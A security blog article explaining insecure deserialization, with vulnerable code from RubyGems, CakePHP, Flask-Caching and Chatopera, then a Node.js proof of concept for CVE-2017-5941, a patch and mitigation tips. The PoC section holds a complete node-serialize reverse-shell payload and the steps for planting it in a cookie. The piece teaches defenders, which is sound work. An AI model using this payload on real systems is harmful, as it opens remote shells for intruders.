Insecure Deserialization

Barış Ekin Yıldırım, 07 Jun 2022

Today’s topic is insecure deserialization. After many years it still holds a place on the OWASP Top 10 list, and it’s safe to assume that we will see many related CVEs in the coming years.

In the OWASP Top 10 2021, it is no longer a separate category as it was in 2017; it is placed under the larger category A08: Software and Data Integrity Failures.

Despite its popularity, some security experts are still unaware of its consequences, and for non-technical people, it is a mystery why we need serialization and deserialization.

So let’s clarify these two concepts first.

P.S. If you are using Python or Ruby, marshalling and unmarshalling (the Marshal module) are similar to serialization and deserialization.

What Is Serialization & Deserialization?

Serialization translates an object or data structure into a format that is more suitable for transfer via a preferred medium (e.g., network, storage, array buffer, etc.) so that it can be reconstructed later.

Serialization is available in statically typed languages (Go, C/C++, Rust, etc.) as well, but there the data is usually decoded into types that are fixed at compile time instead of being cast into arbitrary objects at runtime.

Different languages provide different libraries or classes for serialization/deserialization, such as:

  1. Python - pickle
  2. PHP - serialize()/unserialize()
  3. Java - ObjectOutputStream/ObjectInputStream
  4. JavaScript - JSON.stringify()/JSON.parse()

Deserialization is the exact opposite of serialization. It simply means reconstructing the translated data to its original format, and developers can benefit from both concepts.
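
As a minimal sketch of the two concepts, here is a round trip in Python using the standard json module. The profile object and its fields are made up for illustration.

```python
import json

# A hypothetical in-memory object we want to store or send somewhere
profile = {"username": "admin", "roles": ["editor", "viewer"], "active": True}

# Serialization: in-memory object -> text that can travel over a network or sit on disk
wire_format = json.dumps(profile)

# Deserialization: text -> a new, equivalent in-memory object
restored = json.loads(wire_format)

print(wire_format)
print(restored == profile)
```

The restored object is equal to the original but is a separate copy, which is also why a serialize/deserialize round trip is sometimes used as a simple deep copy.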

In Java programming, serialization facilitates the transportation of objects from one JVM to another. Another use case in languages that run on a managed runtime (Java, C# on .NET) is that this process makes deep copies possible.

Risks of Insecure Deserialization

The impact of insecure deserialization depends on the business criticality of the application. It may lead to remote code execution, denial of service (DoS) attacks, and authentication bypasses.

Even though SAST, DAST, and IAST tools can sometimes detect such vulnerabilities, a human’s supervision would still be good to confirm the findings.

Reviewing Real World Cases

This chapter examines real-world cases that have already affected many production systems. Since these were genuine vulnerabilities in the recent past, walking through them will deepen your understanding of deserialization vulnerabilities.

Ruby

One of Ruby's notoriously unsafe library functions is the YAML library's "load" function. It's insecure, yet it's still possible to see it in production environments today. The code snippet below shows a real-world example of how it was used in RubyGems, Ruby's popular package manager.

RubyGems version 2.5.0 and earlier, before trunk revision 62422, contains a Deserialization of Untrusted Data vulnerability in the owner command that can result in code execution.

The attack is exploitable when the victim runs the gem owner command on a gem with a specially crafted YAML file.

Since no sanitization or validation is applied before the response body is loaded into the “owners” object, the malicious payload is accepted. This vulnerability appears to have been fixed in 2.7.6.

end

with_response response do |resp|
  # YAML.load can instantiate arbitrary Ruby objects from the response body
  owners = YAML.load resp.body

  say "Owners for gem: #{name}"
  owners.each do |owner|

PHP

According to W3Techs’ report, PHP has a 77.5% share among server-side programming languages. It’s still loved by many developers, so lots of frameworks have been built on it. While using a framework does increase productivity and code safety, it doesn’t turn our applications into a fortress. Let's examine a deserialization vulnerability in a widely used PHP framework.

CakePHP is a rapid development framework for PHP developers. It was vulnerable to a file inclusion attack because it called the "unserialize()" function on unchecked user input, which made it possible to inject arbitrary objects into the scope.

function _validatePost(&$controller) {
  // -- snip --
  $check = $controller->data;
  $token = urldecode($check['_Token']['fields']);

  if (strpos($token, ':')) {
    list($token, $locked) = explode(':', $token, 2);
  }

  // User-controlled data reaches unserialize() after a trivial ROT13 decode
  $locked = unserialize(str_rot13($locked));
  // -- snip --
}

As you can see from the above, the $check array contains the user-supplied POST data and $locked is a simple (rot-13 obfuscated) serialized string, which is completely under the user’s control.
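
To show why the ROT13 step offers no protection, here is a small Python sketch that builds and takes apart a token in the same shape the PHP code expects. The function names and the sample values are hypothetical, and the serialized string is a harmless PHP array.

```python
import codecs
from urllib.parse import quote, unquote


def build_fields_token(token_hash, locked_serialized):
    """What any client can produce: hash + ':' + ROT13(serialized data), URL-encoded."""
    return quote(token_hash + ":" + codecs.encode(locked_serialized, "rot_13"))


def split_fields_token(raw):
    """Mirror of the PHP steps: urldecode, split on the first ':', undo ROT13."""
    token_hash, locked = unquote(raw).split(":", 1)
    return token_hash, codecs.decode(locked, "rot_13")


# Hypothetical values for illustration only
example_serialized = 'a:1:{i:0;s:5:"hello";}'
example_token = build_fields_token("abc123", example_serialized)
print(example_token)
print(split_fields_token(example_token))
```

ROT13 is its own inverse and needs no key, so whoever controls the request controls exactly what reaches unserialize().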

Python

Python offers several libraries for serializing and deserializing data. In the Python universe, this operation is also known as marshalling; it’s the same thing as serialization. The standard library's pickle module is well known for being unsafe with untrusted data.

Flask-Caching, a popular caching extension for the Flask framework, relies on pickle for serialization through version 1.10.1, which may lead to remote code execution or local privilege escalation. Since pickle is notorious for being insecure, we do not recommend using it in any sort of production environment.

If an attacker gains access to the cache storage (e.g., filesystem, Memcached, Redis, etc.), they can craft a payload, poison the cache, and execute Python code.

        suffix=self._fs_transaction_suffix, dir=self._path
    )
    with os.fdopen(fd, "wb") as f:
        pickle.dump(timeout, f, 1)
        pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
    os.replace(tmp, filename)
    os.chmod(filename, self._mode)
except (IOError, OSError) as exc:
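
The following is a minimal sketch, not Flask-Caching's code, of why a poisoned pickle is dangerous and of one mitigation described in the Python documentation (restricting globals). The Payload class stands in for attacker-controlled bytes and deliberately runs only a harmless arithmetic expression; NoGlobalsUnpickler and restricted_loads are names chosen for this example.

```python
import io
import pickle


class Payload:
    """Stand-in for attacker-controlled data; the embedded call is deliberately harmless."""

    def __reduce__(self):
        # pickle stores "call eval('6 * 7')" instead of the object's state
        return (eval, ("6 * 7",))


poisoned = pickle.dumps(Payload())

# Plain loads() runs the embedded callable and returns whatever it returns
result = pickle.loads(poisoned)
print(result)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuses to resolve any global, so only plain data types can be loaded."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads(), but rejects pickles that reference callables or classes."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


# Plain data still loads; the poisoned blob raises pickle.UnpicklingError
print(restricted_loads(pickle.dumps({"timeout": 300, "value": [1, 2, 3]})))
```

A restricted unpickler narrows the attack surface, but it only suits caches that hold plain data; a format such as JSON avoids the problem altogether.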

Java

As mentioned earlier in the article, in Java programming, serialization facilitates the transportation of objects from one JVM to another, and it makes deep copies possible. However, these benefits come with a trade-off in some cases.

This example is from a popular open source project in China: Chunsong Customer Service (a.k.a. Chatopera cosin).

As the code snippet below shows, the impsave method in the TemplateController.java file reads the bytes of the uploaded file with dataFile.getBytes() and passes them to the toObject method of the MainUtils utility class.

Following up on this method, we find that the file content is deserialized directly. This means an attacker can execute arbitrary commands on the server by uploading a maliciously constructed file.

TemplateController.java

@RequestMapping("/impsave")
@Menu(type = "admin", subtype = "template", access = false, admin = true)
public ModelAndView impsave(ModelMap map, HttpServletRequest request,
      @RequestParam(value = "dataFile", required = false) MultipartFile dataFile) throws Exception {
   if (dataFile != null && dataFile.getSize() > 0) {
      // The uploaded bytes go straight into Java deserialization
      List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes());
      if (templateList != null && templateList.size() > 0) {
         templateRes.deleteInBatch(templateList);
         for (Template template : templateList) {
            templateRes.save(template);
         }
      }
   }
   return request(super.createView("redirect:/admin/template/index.html"));
}

MainUtils.java

public static Object toObject(byte[] data) throws Exception {
   ByteArrayInputStream input = new ByteArrayInputStream(data);
   ObjectInputStream objectInput = new ObjectInputStream(input);
   return objectInput.readObject();
}

Deserialization PoC on Node.js

CVE-2017-5941 is a well-known vulnerability. Version 0.0.4 of node-serialize, a serialization library for Node.js, contains an insecure deserialization vulnerability.

To test this CVE, we can use the following single-file application:

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

app.use(cookieParser())
app.get('/', function(req, res) {
   if (req.cookies.profile) {
      var str = new Buffer(req.cookies.profile, 'base64').toString();
      var obj = serialize.unserialize(str);

      if (obj.username) {
         res.send( "Hello " + escape(obj.username));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);

When we open the application, a basic HTML page welcomes us.

As you can see, there are no input fields on this web page, and that means it can’t be hacked, right?

Not quite.

If you check the vulnerable code above, a visitor without a profile cookie gets a generic welcome message:

res.send("Hello stranger");

However, the same response also sets a hardcoded base64 token as the profile cookie, so on the next request the “stranger” part changes to “admin”. Let’s decode that token to see what it’s made of:

{"username":"admin","company":"kondukto","location":"cloudbank"}

As you can see, this is a simple cookie made of key-value pairs.
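
If you want to reproduce the decoding step yourself, a short Python sketch is enough. It uses the cookie value from the code above; the "guest" value is just an example to show that anyone can edit a field and re-encode the cookie.

```python
import base64
import json

# The hardcoded profile cookie from the vulnerable application
cookie_value = "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ=="

# base64 is an encoding, not encryption: decoding needs no key
decoded = base64.b64decode(cookie_value).decode("utf-8")
profile = json.loads(decoded)
print(profile)

# Nothing stops the client from changing a field and encoding it again
profile["username"] = "guest"
forged = base64.b64encode(json.dumps(profile).encode("utf-8")).decode("ascii")
print(forged)
```

Because the cookie is neither signed nor encrypted, the server has no way to tell the original value from a forged one.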

Let’s continue.

var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);

In this code block, a string called “str” is created by base64-decoding the profile cookie sent with the request. That string is then unserialized, and the result is assigned to a variable called “obj”.

if (obj.username) {
   res.send("Hello " + escape(obj.username));
}

In the next code block, you can see that the username field of obj is HTML-escaped and printed on the screen.

So basically, this program takes its username value from the cookie that is assigned to you (which you can control) and shows it on the screen after deserializing it.

That means we can insert code of our choice into the Cookie header of an HTTP request and watch what happens.

The payload to test the application is:

{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}

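This code block opens a connection back to your listening host and attaches a shell to it; in other words, it is a reverse shell. The _$$ND_FUNC$$_ prefix tells node-serialize to rebuild the value as a function, and the trailing parentheses make that function run immediately during unserialize().

Since the cookie value must be base64, we have to encode the payload, intercept the HTTP request with a proxy, and replace the cookie value with the new one. And that’s it! A new shell session is created on demand.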

How To Patch A Node.js PoC Deserialization Vulnerability

The best way to patch such a vulnerability is always to upgrade to the latest version of the vulnerable library. However, in this case the vulnerable version is the latest one, and for the sake of our example let’s say we must use this vulnerable library.

One of the deadly sins in the application security bible is trusting user input. To validate the user input, we will use the “express-validator” library. Here is the patched version of the vulnerable code.

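var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
const { cookie, validationResult } = require('express-validator');

var app = express();

// Accept the cookie only if it decodes to a flat JSON object of plain strings,
// none of which starts with one of node-serialize's _$$ND_ markers.
function isPlainProfile(value) {
   var parsed = JSON.parse(Buffer.from(value, 'base64').toString());
   if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
      throw new Error('profile must be a JSON object');
   }
   Object.keys(parsed).forEach(function(key) {
      if (typeof parsed[key] !== 'string' || parsed[key].indexOf('_$$ND_') === 0) {
         throw new Error('unexpected value in profile');
      }
   });
   return true;
}

var profileCheck = cookie('profile').optional().isBase64().custom(isPlainProfile);

app.use(cookieParser())
app.get('/', profileCheck, function(req, res) {
   // Stop here if the cookie failed validation; it never reaches unserialize()
   if (!validationResult(req).isEmpty()) {
      return res.status(400).send("Invalid profile cookie");
   }
   if (req.cookies.profile) {
      var str = Buffer.from(req.cookies.profile, 'base64').toString();
      var obj = serialize.unserialize(str);

      if (obj.username) {
         res.send("Hello " + escape(obj.username));
      }
   } else {
      res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
         maxAge: 900000,
         httpOnly: true
      });
      res.send("Hello stranger");
   }
});

app.listen(3000);

There are two significant changes in that code. The first one is importing the library, of course:

const { cookie, validationResult } = require('express-validator');

The second one is validating the cookie before it reaches unserialize(). The request is rejected unless the decoded cookie is a flat JSON object whose values are plain strings that do not start with one of node-serialize's markers.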

After applying the patch, the payload does not work anymore and the world becomes a safer place for another 5 minutes.

How To Avoid Insecure Deserialization?

To avoid the insecure deserialization problem, the first thing you should do is not accept serialized objects from untrusted sources. Besides, the following suggestions may help you as well:

  • Always validate user input. Use an allow-list approach, since a deny list cannot anticipate all current and future attacks.
  • Only deserialize signed data. You can achieve this by adding digital signature checks to your input processing.
  • Avoid using vulnerable functions or modules (like Python's pickle, Ruby's YAML.load, etc.).
  • Use language-agnostic serialization/deserialization formats like JSON.
  • Look for mitigations specific to your programming language.
  • If you have to use untrustworthy input, deserialize the data in an isolated, low-privilege environment.
  • Using a WAF to protect your application will improve overall security.
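
As an illustration of the "only deserialize signed data" suggestion, here is a minimal Python sketch that combines it with a language-agnostic format (JSON). It uses an HMAC with a shared secret as a simple stand-in for a digital signature; SECRET_KEY, sign and verify_and_load are hypothetical names, and a real deployment would load the key from a secret store.

```python
import hashlib
import hmac
import json

# Hypothetical key for the example; never hardcode a real secret
SECRET_KEY = b"replace-with-a-real-secret"


def sign(obj):
    """Serialize obj as JSON and prefix it with an HMAC-SHA256 tag."""
    body = json.dumps(obj, separators=(",", ":"), sort_keys=True)
    tag = hmac.new(SECRET_KEY, body.encode("utf-8"), hashlib.sha256).hexdigest()
    return tag + "." + body


def verify_and_load(token):
    """Check the tag first; deserialize only if the data is untouched."""
    tag, _, body = token.partition(".")
    expected = hmac.new(SECRET_KEY, body.encode("utf-8"), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking how many characters matched
    if not hmac.compare_digest(tag.encode("utf-8"), expected.encode("utf-8")):
        raise ValueError("signature mismatch, refusing to deserialize")
    return json.loads(body)


token = sign({"username": "admin"})
print(verify_and_load(token))
```

The important design choice is the order of operations: the integrity check happens before any deserialization, so tampered input is rejected without ever being parsed.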

You can find the examples used in the article in this link.
